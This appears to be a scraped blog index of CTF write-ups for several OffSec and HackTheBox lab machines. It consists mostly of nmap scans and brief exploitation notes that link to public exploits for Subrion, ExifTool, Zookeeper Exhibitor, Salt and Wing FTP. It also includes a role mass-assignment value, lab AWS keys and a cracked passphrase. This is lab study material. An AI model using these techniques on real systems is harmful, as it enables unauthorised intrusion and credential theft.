SF:,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(NCP,1C,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(NotesRPC,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x SF:20Request\\r\\n\\r\\n\u0026#34;)%r(JavaRMI,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\ SF:n\\r\\n\u0026#34;)%r(WMSRequest,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r SF:(oracle-tns,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(ms-sql-s SF:,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(afp,1C,\u0026#34;HTTP/1\\.1\\x SF:20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(giop,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x2 SF:0Request\\r\\n\\r\\n\u0026#34;); Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (98%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), Linux 5.0 (92%), OpenWrt 22.03 (Linux 5.10) (92%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (90%), Linux 4.15 (90%), Linux 2.6.32 - 3.10 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 3000/tcp) HOP RTT ADDRESS 1 81.55 ms 192.168.45.1 2 81.53 ms 192.168.45.254 3 81.81 ms 192.168.251.1 4 82.07 ms 192.168.133.231 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.68 seconds ┌──(kali㉿kali)-[~/Desktop/Boxes/Offsec] └─$ nmap 192.168.133.231 -sU --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-14 15:40 EDT Nmap scan report for 192.168.133.231 Host is up (0.085s latency). All 1000 scanned ports on 192.168.133.231 are in ignored states. Not shown: 1000 open|filtered udp ports (no-response) Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds ┌──(kali㉿kali)-[~/Desktop/Boxes/Offsec] Dirbusting # Port 80 # lets change this to true\nNow moving on\nwe have been bought to this filemanager page\nand we have lfi over here\nlets gen our ssh key\nnow lets ssh remi@192.168.133.231 -i Boolean\nPort 33017 —\u0026gt; Development # Exploitation # ","date":"14 March 2026","externalUrl":null,"permalink":"/ctf-writeups/boolean/","section":"CTF Writeups","summary":"","title":"Boolean","type":"ctf-writeups"},{"content":" Exfiltrated # Overview # OS: Linux IP: 192.168.165.98 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # cron that was runnin exiftool vulnerable to rce.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA) | 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA) |_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519) **80/tcp open http Apache httpd 2.4.41 ((Ubuntu))** |_http-title: Did not follow redirect to http://exfiltrated.offsec/ |_http-server-header: Apache/2.4.41 (Ubuntu) **| http-robots.txt: 7 disallowed entries | /backup/ /cron/? /front/ /install/ /panel/ /tmp/ |_/updates/** Lets add exfiltrated.offsec to our hosts file\nDirbusting # Port 80 # Subrion CMS v4.2.1\nSearching that gets us this\nFile Upload —\u0026gt; RCE , but it is Authenticated so lets keep it in mind for now\nSubrion CMS 4.2.1 - Arbitrary File Upload\n/robots.txt # Disallow: /install/ Disallow: /panel/ Disallow: /tmp/ Disallow: /updates/ Exploitation # we were able to login to the administrator panel with default creds\nlets go ahead with authenticated file upload\nNow that we are in lets try to privesc\napparently there is a cron job running image-exif.sh and a file in the root directory called swap.img\non serarching exiftool exploit we get\nhttps://github.com/UNICORDev/exploit-CVE-2021-22204\nnow lets wait a min\nand we are root\n","date":"13 March 2026","externalUrl":null,"permalink":"/ctf-writeups/exfiltrated/","section":"CTF Writeups","summary":"","title":"Exfiltrated","type":"ctf-writeups"},{"content":" Pelican # Overview # OS: Linux IP: 192.168.165.98 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access via ui and then priv esc with sudo -l process dump.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65526 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION **22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)** | ssh-hostkey: | 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61 | 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc= | 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0 139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) **445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)** 631/tcp open ipp syn-ack ttl 61 CUPS 2.2 **|_http-server-header: CUPS/2.2 IPP/2.1** | http-methods: | Supported Methods: GET HEAD OPTIONS POST PUT |_ Potentially risky methods: PUT |_http-title: Forbidden - CUPS v2.2.10 **2181/tcp open zookeeper syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014) 2222/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)** | ssh-hostkey: | 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61 | 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc= | 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0 **8080/tcp open http syn-ack ttl 61 Jetty 1.0** |_http-title: Error 404 Not Found 8081/tcp open http syn-ack ttl 61 nginx 1.14.2 | http-methods: |_ Supported Methods: GET HEAD **POST** OPTIONS |_http-server-header: nginx/1.14.2 |_http-title: Did not follow redirect to http://192.168.165.98:8080/exhibitor/v1/ui/index.html **39605/tcp open java-rmi syn-ack ttl 61 Java RMI** Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: Uptime guess: 40.990 days (since Sat Jan 31 13:52:40 2026) Network Distance: 4 hops TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 28515/tcp): CLEAN (Couldn\u0026#39;t connect) | Check 2 (port 24701/tcp): CLEAN (Couldn\u0026#39;t connect) | Check 3 (port 45580/udp): CLEAN (Timeout) | Check 4 (port 27484/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s | smb2-time: | date: 2026-03-13T18:37:46 |_ start_date: N/A | smb-security-mode: **| account_used: guest** | authentication_level: user | challenge_response: supported **|_ message_signing: disabled (dangerous, but default)** | smb-os-discovery: **| OS: Windows 6.1 (Samba 4.9.5-Debian)** | Computer name: **pelican** | NetBIOS computer name: PELICAN\\x00 | Domain name: \\x00 | FQDN: pelican |_ System time: 2026-03-13T14:37:45-04:00 Dirbusting # Port 8081 # Web behavior was the main signal here, so I traced each response change before exploitation.\nZookeeper v1.0\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nvisiting this\nhttps://www.exploit-db.com/exploits/48654\ndoing this gives us a shell as charles\nPrivEsc # We are able to run this binary\ngcore, lets check it out on gtfo bins\nlet me just note lightdm pid as 672, 661 662 679 680 685 688 692\n514 and 636 are cups\nstrings on those gave me nothing, lets try ps aux | grep root and see if there is anything interesting\ninteresting lets check it out\ni think we got it with su using these creds\n","date":"13 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pelican/","section":"CTF Writeups","summary":"","title":"Pelican","type":"ctf-writeups"},{"content":" Twiggy # Overview # OS: Linux IP: 192.168.165.62 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # Found a exposed api endpoint, which was using an outdated salt version that had an RCE vuln associated w it.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-13 06:47 EDT Nmap scan report for 192.168.165.62 Host is up (0.084s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION **22/tcp open ssh OpenSSH 7.4 (protocol 2.0)** | ssh-hostkey: | 2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA) | 256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA) |_ 256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519) 53/tcp open domain NLnet Labs NSD **80/tcp open http nginx 1.16.1** |_http-title: Home | **Mezzanine** |_http-server-header: nginx/1.16.1 **8000/tcp open http nginx 1.16.1** |_http-title: Site doesn\u0026#39;t have a title (application/json). |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: nginx/1.16.1 4505/tcp open zmtp ZeroMQ ZMTP 2.0 4506/tcp open zmtp ZeroMQ ZMTP 2.0 8000/tcp open http nginx 1.16.1 |_http-title: Site doesn\u0026#39;t have a title (application/json). |_http-server-header: nginx/1.16.1 |_http-open-proxy: Proxy might be redirecting requests Warning: OSScan results may be unreliable because w Dirbusting # nothin Port 4505 \u0026amp; 4506 # ZeroMQ ZMTP 2.0\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # On looking this up\nWe come across this exploit i found online for this version\nlets start a venv\npython -m venv venv source venv/bin/ctivate https://github.com/jasperla/CVE-2020-11651-poc/blob/master/README.md and boom we got our rev shell, had to change the port we were using to avoid the firewall from catching on\n","date":"13 March 2026","externalUrl":null,"permalink":"/ctf-writeups/twiggy/","section":"CTF Writeups","summary":"","title":"Twiggy","type":"ctf-writeups"},{"content":" Facts # Overview # OS: Linux Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # season.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap -sCV -A --min-rate=20000 facts.htb Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-10 06:52 EDT Nmap scan report for facts.htb (10.129.4.247) Host is up (0.10s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA) |_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519) **80/tcp open http nginx 1.26.3 (Ubuntu)** |_http-server-header: nginx/1.26.3 (Ubuntu) |_http-title: facts Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 23/tcp) HOP RTT ADDRESS 1 114.91 ms 10.10.14.1 2 115.04 ms facts.htb (10.129.4.247) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds nmap -sCV -A -p- -min-rate=20000 facts.htb Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-10 07:21 EDT Warning: 10.129.4.247 giving up on port because retransmission cap hit (10). Nmap scan report for facts.htb (10.129.4.247) Host is up (0.12s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA) |_ 256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519) 80/tcp open http nginx 1.26.3 (Ubuntu) |_http-server-header: nginx/1.26.3 (Ubuntu) |_http-title: facts 54321/tcp open http Golang net/http server |_http-title: Did not follow redirect to http://facts.htb:9001 |_http-server-header: MinIO | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 400 Bad Request | Accept-Ranges: bytes | Content-Length: 303 | Content-Type: application/xml | Server: MinIO | Strict-Transport-Security: max-age=31536000; includeSubDomains | Vary: Origin | X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8 | X-Amz-Request-Id: 189B770345D0671F | X-Content-Type-Options: nosniff | X-Xss-Protection: 1; mode=block | Date: Tue, 10 Mar 2026 11:22:14 GMT | \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; | \u0026lt;Error\u0026gt;\u0026lt;Code\u0026gt;InvalidRequest\u0026lt;/Code\u0026gt;\u0026lt;Message\u0026gt;Invalid Request (invalid argument)\u0026lt;/Message\u0026gt;\u0026lt;Resource\u0026gt;/nice ports,/Trinity.txt.bak\u0026lt;/Resource\u0026gt;\u0026lt;RequestId\u0026gt;189B770345D0671F\u0026lt;/RequestId\u0026gt;\u0026lt;HostId\u0026gt;dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8\u0026lt;/HostId\u0026gt;\u0026lt;/Error\u0026gt; | GenericLines, Help, RTSPRequest, SSLSessionReq: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 400 Bad Request | Accept-Ranges: bytes | Content-Length: 276 | Content-Type: application/xml | Server: MinIO | Strict-Transport-Security: max-age=31536000; includeSubDomains | Vary: Origin | X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8 | X-Amz-Request-Id: 189B76FF6775CEB9 | X-Content-Type-Options: nosniff | X-Xss-Protection: 1; mode=block | Date: Tue, 10 Mar 2026 11:21:57 GMT | \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; | \u0026lt;Error\u0026gt;\u0026lt;Code\u0026gt;InvalidRequest\u0026lt;/Code\u0026gt;\u0026lt;Message\u0026gt;Invalid Request (invalid argument)\u0026lt;/Message\u0026gt;\u0026lt;Resource\u0026gt;/\u0026lt;/Resource\u0026gt;\u0026lt;RequestId\u0026gt;189B76FF6775CEB9\u0026lt;/RequestId\u0026gt;\u0026lt;HostId\u0026gt;dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8\u0026lt;/HostId\u0026gt;\u0026lt;/Error\u0026gt; | HTTPOptions: | HTTP/1.0 200 OK | Vary: Origin | Date: Tue, 10 Mar 2026 11:21:57 GMT |_ Content-Length: 0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port54321-TCP:V=7.95%I=7%D=3/10%Time=69AFFED5%P=x86_64-pc-linux-gnu%r(G SF:enericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20 SF:text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\ SF:x20Request\u0026#34;)%r(GetRequest,2B0,\u0026#34;HTTP/1\\.0\\x20400\\x20Bad\\x20Request\\r\\nAc SF:cept-Ranges:\\x20bytes\\r\\nContent-Length:\\x20276\\r\\nContent-Type:\\x20app SF:lication/xml\\r\\nServer:\\x20MinIO\\r\\nStrict-Transport-Security:\\x20max-a SF:ge=31536000;\\x20includeSubDomains\\r\\nVary:\\x20Origin\\r\\nX-Amz-Id-2:\\x20 SF:dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8\\r\\nX-A SF:mz-Request-Id:\\x20189B76FF6775CEB9\\r\\nX-Content-Type-Options:\\x20nosnif SF:f\\r\\nX-Xss-Protection:\\x201;\\x20mode=block\\r\\nDate:\\x20Tue,\\x2010\\x20Ma SF:r\\x202026\\x2011:21:57\\x20GMT\\r\\n\\r\\n\u0026lt;\\?xml\\x20version=\\\u0026#34;1\\.0\\\u0026#34;\\x20encod SF:ing=\\\u0026#34;UTF-8\\\u0026#34;\\?\u0026gt;\\n\u0026lt;Error\u0026gt;\u0026lt;Code\u0026gt;InvalidRequest\u0026lt;/Code\u0026gt;\u0026lt;Message\u0026gt;Invalid\\x2 SF:0Request\\x20\\(invalid\\x20argument\\)\u0026lt;/Message\u0026gt;\u0026lt;Resource\u0026gt;/\u0026lt;/Resource\u0026gt;\u0026lt;Req SF:uestId\u0026gt;189B76FF6775CEB9\u0026lt;/RequestId\u0026gt;\u0026lt;HostId\u0026gt;dd9025bab4ad464b049177c95eb6 SF:ebf374d3b3fd1af9251148b658df7ac2e3e8\u0026lt;/HostId\u0026gt;\u0026lt;/Error\u0026gt;\u0026#34;)%r(HTTPOptions,5 SF:9,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nVary:\\x20Origin\\r\\nDate:\\x20Tue,\\x2010\\x20 SF:Mar\\x202026\\x2011:21:57\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSP SF:Request,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text SF:/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20R SF:equest\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type: SF:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20 SF:Bad\\x20Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request SF:\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20clo SF:se\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(FourOhFourRequest,2CB,\u0026#34;HTTP/1\\.0\\x2 SF:0400\\x20Bad\\x20Request\\r\\nAccept-Ranges:\\x20bytes\\r\\nContent-Length:\\x2 SF:0303\\r\\nContent-Type:\\x20application/xml\\r\\nServer:\\x20MinIO\\r\\nStrict- SF:Transport-Security:\\x20max-age=31536000;\\x20includeSubDomains\\r\\nVary:\\ SF:x20Origin\\r\\nX-Amz-Id-2:\\x20dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af SF:9251148b658df7ac2e3e8\\r\\nX-Amz-Request-Id:\\x20189B770345D0671F\\r\\nX-Con SF:tent-Type-Options:\\x20nosniff\\r\\nX-Xss-Protection:\\x201;\\x20mode=block\\ SF:r\\nDate:\\x20Tue,\\x2010\\x20Mar\\x202026\\x2011:22:14\\x20GMT\\r\\n\\r\\n\u0026lt;\\?xml\\ SF:x20version=\\\u0026#34;1\\.0\\\u0026#34;\\x20encoding=\\\u0026#34;UTF-8\\\u0026#34;\\?\u0026gt;\\n\u0026lt;Error\u0026gt;\u0026lt;Code\u0026gt;InvalidReque SF:st\u0026lt;/Code\u0026gt;\u0026lt;Message\u0026gt;Invalid\\x20Request\\x20\\(invalid\\x20argument\\)\u0026lt;/Messag SF:e\u0026gt;\u0026lt;Resource\u0026gt;/nice\\x20ports,/Trinity\\.txt\\.bak\u0026lt;/Resource\u0026gt;\u0026lt;RequestId\u0026gt;189B SF:770345D0671F\u0026lt;/RequestId\u0026gt;\u0026lt;HostId\u0026gt;dd9025bab4ad464b049177c95eb6ebf374d3b3f SF:d1af9251148b658df7ac2e3e8\u0026lt;/HostId\u0026gt;\u0026lt;/Error\u0026gt;\u0026#34;); Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 114.28 ms 10.10.14.1 2 114.52 ms facts.htb (10.129.4.247) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 41.57 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # lets look at Camaleon CMS\nif the key exits in the database users table has role:string attacker can send password[role]=admin and thr rails sees @user.role = “admin”\nnow we have admin\nAKIAA042540D4E8C3E8E\nZf5bIMiltmLF2ux1JZyX3Gs3MasRtlwcAolHc7em\nlets use these creds with the AWS CLI and enumerate all the s3 buckets\n┌──(kali㉿kali)-[~/Desktop/vpn] └─$ aws --endpoint-url http://facts.htb:54321 s3 ls s3://internal/ PRE .bundle/ PRE .cache/ PRE .ssh/ 2026-01-08 13:45:13 220 .bash_logout 2026-01-08 13:45:13 3900 .bashrc 2026-01-08 13:47:17 20 .lesshst 2026-01-08 13:47:17 807 .profile ┌──(kali㉿kali)-[~/Desktop/vpn] └─$ aws --endpoint-url http://facts.htb:54321 s3 ls s3://randomfacts/ PRE thumb/ 2025-09-11 08:07:06 446847 animalejected.png 2025-09-11 08:07:06 271210 annefrankasteroid.png 2025-09-11 08:07:06 255778 catsattachment.png 2025-09-11 08:07:05 411597 cuteanimals.png 2025-09-11 08:07:05 177331 darkchocolate.png 2025-09-11 08:07:05 312753 dogscatssmell.png 2025-09-11 08:07:04 922561 dolphinfact.png 2025-09-11 08:07:04 67352 finlandhappiest.png 2025-09-11 08:07:04 388178 firstimpressions.png 2025-09-11 08:07:04 100689 firsttransaction.png 2025-09-11 08:07:03 222436 firstwebcam.png 2025-09-11 08:07:03 128158 georgewashingtonslaves.png 2025-09-11 08:07:03 34816 logopage.png 2025-09-11 08:07:03 16886 logopage2.png 2025-09-11 08:07:02 80796 pressureupbeat.png 2025-09-11 08:07:02 24792 primary-question-mark.png 2025-09-11 08:07:02 341284 smallanimals.png 2025-09-11 08:07:02 332397 superiorpeople.png 2025-09-11 08:07:01 39579 vanilla.png 2025-09-11 08:07:01 35769 youtubewatchhours.png and using a exploit we found online we enumerated the etc/passwd file to find a user called trivia who apparently owns this ssh key\nloggin after cracking the key with john to get the pass as dragonballz\nwe get the user flag\nsudo -l shows we can execute a binary called facts as sudo, and we exploit that thru gtfobins\n","date":"10 March 2026","externalUrl":null,"permalink":"/ctf-writeups/facts/","section":"CTF Writeups","summary":"","title":"Facts","type":"ctf-writeups"},{"content":"","date":"10 March 2026","externalUrl":null,"permalink":"/tags/hackthebox/","section":"Tags","summary":"","title":"Hackthebox","type":"tags"},{"content":"","date":"10 March 2026","externalUrl":null,"permalink":"/tags/htb/","section":"Tags","summary":"","title":"Htb","type":"tags"},{"content":" WingData # Overview # OS: Linux IP: 10.129.244.106 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # season.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Host is up (0.11s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0) | ssh-hostkey: | 256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA) |_ 256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519) **80/tcp open http Apache httpd 2.4.66 |_http-title: Did not follow redirect to http://wingdata.htb/** |_http-server-header: Apache/2.4.66 (Debian) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (95%) OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0 Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (95%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.15 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 104.67 ms 10.10.14.1 2 104.69 ms 10.129.244.106 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nlets add this to our hosts\nftp # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)\nhttps://www.exploit-db.com/exploits/52347\nwhen trying to revshell thru this it keep dying so lets use this other poc\nhttps://github.com/estebanzarate/CVE-2025-47812-Wing-FTP-Server-7.4.3-Unauthenticated-RCE-PoC\nusing nc we were able to change our shell\nIN_ACCOUNTS Description=\u0026#34;Wing FTP Server Admin Accounts\u0026#34;\u0026gt; \u0026lt;ADMIN\u0026gt; \u0026lt;Admin_Name\u0026gt;admin\u0026lt;/Admin_Name\u0026gt; 